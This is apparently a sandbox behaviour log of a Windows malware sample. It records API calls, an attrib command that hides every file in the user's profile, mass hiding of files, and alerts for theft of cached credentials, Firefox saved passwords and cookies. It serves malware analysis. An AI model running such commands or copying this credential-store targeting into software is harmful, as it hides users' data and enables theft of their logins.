  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Start Menu" = C:\Documents and Settings\All Users\Start Menu
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
1436
Process
Started
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  attrib +h "C:\Documents and Settings\admin\*.*" /s /d
16321436
Malicious  Alert
Misc  Anomaly
Message:   External file attribute modification    Detail:   Malware modifying file attributes via an external process   
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
  Imagepath:  C:\WINDOWS\system32\attrib.exe
1632
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\AutoFillDefaults.dat
1632
Malicious  Alert
Misc  Anomaly
Message:   File/folder hiding    Detail:   Malware hiding file/folder   
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\defaultHeuristics.dat
1632870
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer\metadata\Synchronizer80
163221504
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer\adobesynchronizersu80
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer\metadata
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\AdobeCMapFnt08.lst
1632508
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\AdobeSysFnt08.lst
163223094
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\UserCache.bin
163216606
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics
1632
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}
1632
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials
1632
Malicious  Alert
Data  Theft
Message:   Cached credentials theft    Detail:   Malware stealing credentials for remote network shares   
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\hh.dat
16328590
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.bak
1632141
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
163210381
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch
1632
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\EnergyCrisis.LNK
1632536
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\HomeWork.LNK
1632401
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\ParaPsychology.LNK
1632546
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\Templates.LNK
1632766
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\Worksheet.LNK
1632521
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\Excel11.pip
16321544
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\MSO1033.acl
163237814
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\MSOut11.pip
16321696
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\PowerP11.pip
16321476
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\Word11.pip
16321684
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\Outlook.srs
16322560
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\Outlook.xml
16322052
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Templates\Normal.dot
163232256
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\AddIns
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Excel
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Media Player
1632
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\MMC
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Outlook
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Proof
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Templates
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Word
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\InstallTime20101012113537
163210
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\bookmarkbackups\bookmarks-2012-01-26.json
16324131
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\chrome\userChrome-example.css
1632959
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\chrome\userContent-example.css
1632663
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\bookmarkbackups
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\bookmarks.html
16326284
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cert8.db
163265536
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\chrome
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\compatibility.ini
1632188
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\compreg.d
   at
1632147965
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\content-p
   refs.sqlite
16327168
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cookies.s
   qlite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cookies.s
   qlite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\downloads
   .sqlite
16322048
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.cache
1632425
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.ini
1632277
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.log
1632430
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.rdf
16323357
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\formhisto
   ry.sqlite
16324096
Malicious  Alert
Data  Theft
Message:   Firefox auto-complete password theft    Detail:   Malware stealing auto-complete password   
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\formhisto
   ry.sqlite
16324096
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\key3.db
163216384
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\localstor
   e.rdf
16321454
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\mimeTypes
   .rdf
16326211
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\minidumps
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\permissio
   ns.sqlite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\places.sq
   lite
1632135168
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\places.sq
   lite-journal
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\pluginreg
   .dat
  MD5:  e2f29b9a9f0c02b8686ce4228f1a99ee
  SHA1: 7e48e7800d6ee451c476169667fc3a83101bfcd6
16329062
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\prefs.js
  MD5:  df60af0a8c7581ced90a1fbbc60c2434
  SHA1: 2e5a2d4581fd74b51f7d800cb9ee64442d58c133
16323232
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\prefs.js.
   bak
16323231
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\search.js
   on
163211719
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\search.sq
   lite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\secmod.db
163216384
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\xpti.dat
1632102494
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports
1632
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\profiles.ini
1632111
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Extensions
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\CDBurning.log
16322
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\GenDevices.log
1632465
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\pdgenctnomad.log
1632456
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\pdgenwmdm.log
1632449
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\browserrecord.swf
  MD5:  5d76f9e475bc29044acb3653d8a1b339
  SHA1: 18e5b37a7da3d13af1070d75d30ef1cd7ea05715
1632994
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\browserrecordupdate.dat
1632459
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\browserrecordupdateloc.dat
1632532
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
163280910
File
Hide
C:\Documents and Settings\admin\Application Data\Real\rnadmin\rnsystem.dat
16321161
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\Msg
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\rnadmin
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\deployment.properties
1632909
File
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\Data1.cab
163213005452
File
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\jre1.6.0_16.msi
16321757696
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Identities
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun
1632
Folder
Open
C:\Documents and Settings\admin\Cookies
1632
File
Open
C:\Documents and Settings\admin\Cookies\admin@ad.wsod[2].txt
1632176
File
Hide
C:\Documents and Settings\admin\Cookies\admin@ad.wsod[2].txt
1632176
File
Open
C:\Documents and Settings\admin\Cookies\admin@atdmt[2].txt
1632180
File
Hide
C:\Documents and Settings\admin\Cookies\admin@atdmt[2].txt
1632180
File
Open
C:\Documents and Settings\admin\Cookies\admin@bing[2].txt
1632192
File
Hide
C:\Documents and Settings\admin\Cookies\admin@bing[2].txt
1632192
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.atdmt[2].txt
1632198
File
Hide
C:\Documents and Settings\admin\Cookies\admin@c.atdmt[2].txt
1632198
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.msn[1].txt
163267
File
Hide
C:\Documents and Settings\admin\Cookies\admin@c.msn[1].txt
163267
File
Open
C:\Documents and Settings\admin\Cookies\admin@match[2].txt
1632174
File
Hide
C:\Documents and Settings\admin\Cookies\admin@match[2].txt
1632174
File
Open
C:\Documents and Settings\admin\Cookies\admin@microsoft[1].txt
1632108
File
Hide
C:\Documents and Settings\admin\Cookies\admin@microsoft[1].txt
1632108
File
Open
C:\Documents and Settings\admin\Cookies\admin@msn[1].txt
1632584
File
Hide
C:\Documents and Settings\admin\Cookies\admin@msn[1].txt
1632584
File
Open
C:\Documents and Settings\admin\Cookies\admin@scorecardresearch[2].txt
1632195
File
Hide
C:\Documents and Settings\admin\Cookies\admin@scorecardresearch[2].txt
1632195
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.bing[1].txt
1632111
File
Hide
C:\Documents and Settings\admin\Cookies\admin@www.bing[1].txt
1632111
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.msn[2].txt
1632230
File
Hide
C:\Documents and Settings\admin\Cookies\admin@www.msn[2].txt
1632230
File
Open
C:\Documents and Settings\admin\Cookies\index.dat
163232768
File
Hide
C:\Documents and Settings\admin\Cookies\index.dat
163232768
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Customize Links.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Free Hotmail.url
1632113
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Windows Marketplace.url
1632169
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Windows Media.url
1632118
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Windows.url
1632113
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\IE Add-on site.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Marketplace.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Microsoft At Home.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Microsoft At Work.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Welcome to IE7.url
1632133
Folder
Hide
C:\Documents and Settings\admin\Favorites\Links
1632
Folder
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites
1632
File
Hide
C:\Documents and Settings\admin\Favorites\MSN.com.url
1632119
File
Hide
C:\Documents and Settings\admin\Favorites\Radio Station Guide.url
1632197
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\AcroFnt08.ls
   t
16327980
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Updater\updater.lo
   g
16321756
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Updater
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\ACECache6.lst
16324377
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color
1632
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials
1632
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-14090
   82233-688789844-725345543-1003
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\Microsoft Feeds~\Mic
   rosoft at Home~.feed-ms
163228672
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\Microsoft Feeds~\Mic
   rosoft at Work~.feed-ms
163228672
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-m
   s
16325120
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\Microsoft Feeds~
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds Cache\GZTM07S1\fwlin
   k[1]
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds Cache\LQ0B1692\fwlin
   k[1]
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\FORMS\FRMCACHE.DAT
1632175500
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Internet Explorer\brndlog.
   txt
16328660
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ
   .DAT
163216384
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Media Player\CurrentDataba
   se_59R.wmdb
1632720896
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Outlook\extend.dat
1632519
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Outlook\Outlook.pst
1632271360
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\10.0\WMSDKNS
   .DTD
1632498
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\10.0\WMSDKNS
   .XML
163212784
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.
   DTD
1632498
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.
   XML
163212784
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\10.0
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\9.0
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\CD Burning
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\FORMS
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Internet Explorer
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Media Player
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\OFFICE
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Outlook
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Silverlight
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_001_
16324096
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_002_
16324096
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_003_
16324096
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_MAP_
16328468
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\urlclassifier3.sqlite
163232768
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\XPC.mfl
  MD5:  3cb074bd9bec5869d44fd5cbae2baec1
  SHA1: 66344ee8349519b6a3145471ffa78bfee3553f78
16324015580
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\XUL.mfl
16321047114
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles
1632
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF
   .ini
16323584
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
163213104
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat
163232768
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\OHotfix\OHotfix(00001).log
16323865
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\OHotfix\OHotfix(00001)_Msi.log
16325944646
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\outlook logging\firstrun.log
1632699
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Accessibility\Acces
   sibility Wizard.lnk
16321520
API Call
  API Name:  Sleep   Address:  0x004027fc
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Hype
   rTerminal.lnk
1632786
File
Hide

